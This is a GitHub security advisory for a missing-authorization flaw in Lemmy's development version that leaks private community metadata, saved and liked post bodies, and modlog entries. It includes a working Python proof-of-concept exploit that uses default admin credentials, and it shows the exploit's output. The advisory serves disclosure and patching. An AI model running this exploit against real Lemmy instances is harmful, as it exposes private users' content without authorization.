Skip to content

Lemmy may expose private community data through community, saved, liked, and modlog API views

Moderate severity GitHub Reviewed Published Apr 29, 2026 in LemmyNet/lemmy • Updated Jun 8, 2026

Package

cargo lemmy_api (Rust)

Affected versions

<= 0.19.1-rc.1

Patched versions

None

Description

NOTE: Only affects development version.

Summary

Lemmy applies private-community checks in PostView and CommentView, but several adjacent API views skip the accepted-follower filter. Bob, a registered user who is not an accepted follower, can read private community sidebar and summary fields. Alice, a former accepted follower, can still read saved and liked private post bodies after she leaves. An unauthenticated visitor can read private community metadata and removed private post names through the modlog.

Details

CommunityView::read() and CommunityQuery::list() call visible_communities_only(), but they do not add the private-community filter used by post and comment reads:

query = my_local_user.visible_communities_only(query);
query.first(conn).await.with_lemmy_type(LemmyErrorType::NotFound)

PersonSavedCombinedQuery::list() and PersonLikedCombinedQuery::list() join community_actions, but they only filter by the requesting person id. They do not require community_actions.follow_state = Accepted when the community has visibility = Private.

The modlog query returns ListingType::All without a visibility predicate:

query = match self.listing_type.unwrap_or(ListingType::All) {
  ListingType::All => query,

The control paths show the expected check. PostView::read() and CommentView::read() both filter private communities to accepted followers:

community::visibility
  .ne(CommunityVisibility::Private)
  .or(community_actions::follow_state.eq(CommunityFollowerState::Accepted))

Proof of Concept

The following script reproduces the leak against a fresh Lemmy instance. Tested against dessalines/lemmy:nightly with the default setup account from the sample config. The script opens registration so it can create Alice and Bob.

import requests, random, string

BASE = "http://127.0.0.1:8536/api/v4"  # change to the target Lemmy URL
ADMIN_USER = "lemmy"
ADMIN_PASS = "lemmylemmy"
PASSWORD = "Password123456!"

def req(method, path, token=None, params=None, **body):
    headers = {}
    if token:
        headers["Authorization"] = "Bearer " + token
    return requests.request(method, BASE + path, headers=headers, params=params, json=body or None)

def register(name):
    r = req("POST", "/account/auth/register", username=name, password=PASSWORD,
            password_verify=PASSWORD, email=name + "@example.test")
    r.raise_for_status()
    token = r.json()["jwt"]
    person_id = req("GET", "/account", token).json()["local_user_view"]["person"]["id"]
    return token, person_id

def show(label, response, marker):
    text = response.text
    print("\n" + label + ": HTTP", response.status_code)
    print(text[:700])
    print("contains marker:", marker in text)

suffix = "poc" + "".join(random.choice(string.ascii_lowercase) for _ in range(6))
admin = req("POST", "/account/auth/login", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()["jwt"]
req("PUT", "/site", admin, registration_mode="open", email_verification_required=False)

alice, alice_id = register("alice" + suffix)
bob, _ = register("bob" + suffix)
secret = "SECRET_" + suffix

community = req("POST", "/community", admin,
                name="priv" + suffix,
                title="Private Proof " + suffix,
                sidebar=secret + " sidebar",
                summary=secret + " summary",
                visibility="private").json()["community_view"]["community"]
community_id = community["id"]
post = req("POST", "/post", admin, name="secret post " + suffix,
           community_id=community_id, body=secret + " post body").json()["post_view"]["post"]
post_id = post["id"]

show("Bob reads private community metadata", req("GET", "/community", bob, params={"id": community_id}), secret)
show("Bob direct post read control", req("GET", "/post", bob, params={"id": post_id}), secret)

req("POST", "/community/follow", alice, community_id=community_id, follow=True)
req("POST", "/community/pending_follows/approve", admin,
    community_id=community_id, follower_id=alice_id, approve=True)
req("PUT", "/post/save", alice, post_id=post_id, save=True)
req("POST", "/post/like", alice, post_id=post_id, is_upvote=True)
req("POST", "/community/follow", alice, community_id=community_id, follow=False)

show("Alice direct post read after leaving", req("GET", "/post", alice, params={"id": post_id}), secret)
show("Alice saved list after leaving", req("GET", "/account/saved", alice), secret)
show("Alice liked list after leaving", req("GET", "/account/liked", alice), secret)

mod_comm = req("POST", "/community", admin,
               name="modlog" + suffix,
               title="Private Modlog " + suffix,
               sidebar=secret + " modlog sidebar",
               summary=secret + " modlog summary",
               visibility="private").json()["community_view"]["community"]
mod_post = req("POST", "/post", admin, name=secret + " removed post",
               community_id=mod_comm["id"], body="body").json()["post_view"]["post"]
req("POST", "/post/remove", admin, post_id=mod_post["id"], removed=True, reason="poc")
show("Unauthenticated modlog", req("GET", "/modlog", params={"listing_type": "all", "limit": 50}), secret)

Output:

Bob reads private community metadata: HTTP 200
contains marker: True
Bob direct post read control: HTTP 404
contains marker: False
Alice direct post read after leaving: HTTP 404
contains marker: False
Alice saved list after leaving: HTTP 200
contains marker: True
Alice liked list after leaving: HTTP 200
contains marker: True
Unauthenticated modlog: HTTP 200
contains marker: True

Impact

Bob can read private community descriptions and sidebars before a moderator approves him. Alice can leave a private community, or a moderator can remove her, and Lemmy still returns private post bodies that Alice saved or liked while she was a member. An unauthenticated visitor can use the public modlog to discover private community metadata and removed private post names.

Recommended Fix

Apply the same private-community filter used by PostView and CommentView to CommunityView::read(), CommunityQuery::list(), PersonSavedCombinedQuery::list(), PersonLikedCombinedQuery::list(), and the ListingType::All branch of the modlog query. Admins and accepted followers should keep access. Other callers should receive the same 404 behavior as GET /post and GET /comment.

Found by aisafe.io

References

@Nutomic Nutomic published to LemmyNet/lemmy Apr 29, 2026
Published to the GitHub Advisory Database May 6, 2026
Reviewed May 6, 2026
Last updated Jun 8, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

EPSS score

Weaknesses

Missing Authorization

The product does not perform an authorization check when an actor attempts to access a resource or perform an action. Learn more on MITRE.

CVE ID

No known CVE

GHSA ID

GHSA-95q8-x6r6-672m

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.